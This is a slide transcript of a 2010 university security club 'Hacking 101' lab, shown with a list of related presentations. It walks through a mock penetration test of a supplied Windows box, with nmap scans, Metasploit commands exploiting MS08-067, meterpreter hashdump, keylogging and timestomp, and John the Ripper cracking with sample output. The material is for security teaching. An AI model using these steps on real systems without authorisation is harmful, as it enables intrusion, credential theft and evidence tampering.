Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair.

Slides:



Advertisements
Similar presentations
By Bruce Ellis Western Governors University. Demonstrate the need for updating information systems Build security awareness Inform management of the risk.
Advertisements

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Armitage and Metasploit Penetration Testing Lab
Computer Security Fundamentals
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.
Offensive Security Part 1 Basics of Penetration Testing
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.
Computer Security and Penetration Testing
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
Penetration Testing.
Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.
Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau ( ) Lee Shirly ( ) Ong Ivy ( )
4/13/2010.  CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room /11/10.
Ana Chanaba Robert Huylo
Module 4: Add Client Computers and Devices to the Network.
Karlstad University Introduction to Vulnerability Assessment Labs Ge Zhang Dvg-C03.
MIS Week 2 Site:
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
The Microsoft Baseline Security Analyzer A practical look….
Computer Security and Penetration Testing Chapter 16 Windows Vulnerabilities.
Penetration Testing Training Day Penetration Testing Tools and Techniques – pt 1 Mike Westmacott, IRM plc Supported by.
Snort & Nmap Mike O’Connor Eric Tallman Matt Yasiejko.
© 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze.
Hands on with BackTrack Information gathering, scanning, simple exploits By Edison Carrick.
System Hacking Active System Intrusion. Aspects of System Hacking System password guessing Password cracking Key loggers Eavesdropping Sniffers Man in.
Linux Networking and Security
Trinity Uses Nmap, shouldn’t you?. From “The Art of War” "... knowing your enemy 100% of the time, you will win your battle 100% of the time, knowing.
1 Security Penetration Testing Angela Davis Mrinmoy Ghosh ECE4112 – Internetwork Security Georgia Institute of Technology.
Module 14: Securing Windows Server Overview Introduction to Securing Servers Implementing Core Server Security Hardening Servers Microsoft Baseline.
Penetration Testing 101 (Boot-camp)
TCOM Information Assurance Management System Hacking.
Module 7 – Gaining Access & Privilege Escalation  Phase II  Controls Assessment  Scheduling ○ Information Gathering ○ Network Mapping ○ Vulnerability.
Retina Network Security Scanner
CNIT 124: Advanced Ethical Hacking Ch 13: Post Exploitation Part 2.
Module 7: Designing Security for Accounts and Services.
Kali Linux BY BLAZE STERLING. Roadmap  What is Kali Linux  Installing Kali Linux  Included Tools  In depth included tools  Conclusion.
Penetration Testing By Blaze Sterling. Roadmap What is Penetration Testing How is it done? Penetration Testing Tools Kali Linux In depth included tools.
Top 10 Hacking Tool Welcome TO hackaholic Kumar shubham.
Introduction to Vulnerability Assessment Labs Ge Zhang Dvg-C03.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Mitchell Adair Computer Security Group Feb. 10th, 2010 Enumerating Windows Users.
Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Protection (tools).
Hacking Windows.
Metasploit Framework (MSF) Fundamentals
Penetration Testing Scanning
Computer Security Fundamentals
Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
A Comprehensive Security Assessment of the Westminster College Unix Lab Jacob Shodd.
Advanced Penetration Testing
Module 22 (Metasploit Introduction)
CIT 480: Securing Computer Systems
Penetration Testing 10/12/2018 Penetration Testing.
Penetration Testing 10/12/2018 Penetration Testing.
Backtrack Metasploit and SET
Web Application Penetration Testing ‘17
Metasploit Analysis Report Overview
Implementing Client Security on Windows 2000 and Windows XP Level 150
Cyber Operation and Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack Cliff Zou University of Central Florida.
Penetration Testing & Network Defense
Intro Cyber Security Labs on GENI
Presentation transcript:

Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair

Tonight Out first “interactive” meeting Introduction to Backtrack A mini penetration test Scenario Outline Enumeration, Exploitation, Post Exploitation Exercise Summary Resources

Scenario Company X wants you to test if their internal boxes are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

Outline Enumeration OS, services, versions, filters Exploitation Exploit a known vulnerability Get shell access to the box Post Exploitation Shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot

Enumeration 'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org nmap [Scan Type(s)] [Options] {target specification} Scan Types -sS, Syn -sT, Connect -sA, Ack … Options -O, OS -sV, services -v, verbose …

… Enumeration nmap Default scan, Syn, top 1000 ports nmap -v -sV -O p Verbose, services, OS, ports 1 through nmap -PN --script=smb* -sV -O Don't ping, run all smb* scripts, service, OS

Nmap Output Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)... OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1... Host script results: | smb-os-discovery: Windows 2000 | smb-enum-domains: | Domain: MITCHELL-32D5C5 | |_ SID: S | |_ Users: add, Administrator, Guest, s3cr3tus3r, sally... | Anonymous shares: IPC$ |_ Restricted shares: ADMIN$, C$... | smb-check-vulns: |_ MS08-067: VULNERABLE

Exploitation Metasploit – Penetration Testing Framework tools, libraries, modules, and user interfaces # msfconsole msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST set PAYLOAD windows/meterpreter/bind_tcp exploit

Post Exploitation Gather useful information SSH & GPG keys, hashes, etc... Pivot meterpreter > hashdump sysinfo keyscan_(start | stop | dump) timestomp migrate shell

… Post Exploitation We dumped the hashes... now what? Pass the hash Crack the hash John the Ripper a tool to find weak passwords of your users John [options] password-files --wordlist --users, --groups --session, --restore

… Post Exploitation John --wordlist=/.../password.lst /tmp/hashes.txt Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX]) ABC123 (sally) SECRET (s3cr3tus3r) (Guest) BASKETB (webmaster:1) ALL (webmaster:2) ADMIN1 (Administrator) guesses: 5 time: 0:00:00:00 100% c/s: trying: SKIDOO - ZHONGGU

So... let's get started Boot up to your Backtrack CD passwd /etc/init.d/networking start startx Follow along... let's pwn this box :)

Summary Clearly... Company X's default user workstations needs some work. Now let's do the paperwork!... just joking ;) Hopefully this gives everyone a hands on introduction to Backtrack, some essential tools, and the attacker's mindset & process. We want feedback, please!!!! Feedback will steer this organization!!!!

Resources utdcsg.org Forums - please register! IRC - irc.oftc.net, #utdcsg - Nmap - nmap.org/5/ Metasploit - metasploit.com/ John the Ripper - openwall.com/john/

Thanks Next meeting March 24th, 8:30, ECSS Cracking WPA ARP spoofing (traffic redirection, password sniffing)

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.